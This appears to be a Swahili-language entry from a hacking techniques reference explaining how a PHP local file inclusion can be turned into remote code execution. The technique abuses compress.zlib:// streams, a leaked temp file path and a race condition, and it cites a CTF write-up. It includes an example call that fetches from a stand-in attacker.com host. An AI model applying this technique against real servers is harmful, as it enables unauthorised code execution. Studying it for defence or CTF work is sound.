LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

compress.zlib:// na PHP_STREAM_PREFER_STDIO

Fail iliyofunguliwa kwa kutumia itifaki compress.zlib:// na bendera PHP_STREAM_PREFER_STDIO inaweza kuendelea kuandika data zinazofika kwenye muunganisho baadaye kwenye faili hiyo hiyo.

Hii inamaanisha kwamba wito kama:

file_get_contents("compress.zlib://http://attacker.com/file")

Nitapeleka ombi likiomba http://attacker.com/file, kisha seva inaweza kujibu ombi hilo kwa jibu halali la HTTP, kuweka muunganisho wazi, na kutuma data za ziada baadaye ambazo pia zitaandikwa kwenye faili.

Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:

/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}

Race Condition to RCE

CTF hii ilitatuliwa kwa kutumia hila ya awali.

Mshambuliaji atafanya server ya mwathirika ifungue muunganisho ikisoma faili kutoka kwa server ya mshambuliaji kwa kutumia compress.zlib itifaki.

Wakati muunganisho huu upo, mshambuliaji atafanya kuondoa njia ya faili ya muda iliyoundwa (imevuja kutoka kwa server).

Wakati muunganisho bado uko wazi, mshambuliaji atafanya kudhulumu LFI ikipakia faili ya muda ambayo anadhibiti.

Hata hivyo, kuna ukaguzi katika server ya wavuti ambao unazuia kupakia faili zinazokuwa na <?. Kwa hivyo, mshambuliaji atatumia Race Condition. Katika muunganisho ambao bado uko wazi, mshambuliaji atatuma PHP payload BAADA YA webserver kuangalia ikiwa faili ina wahusika waliokatazwa lakini KABLA ya kupakia maudhui yake.

Kwa maelezo zaidi angalia maelezo ya Race Condition na CTF katika https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer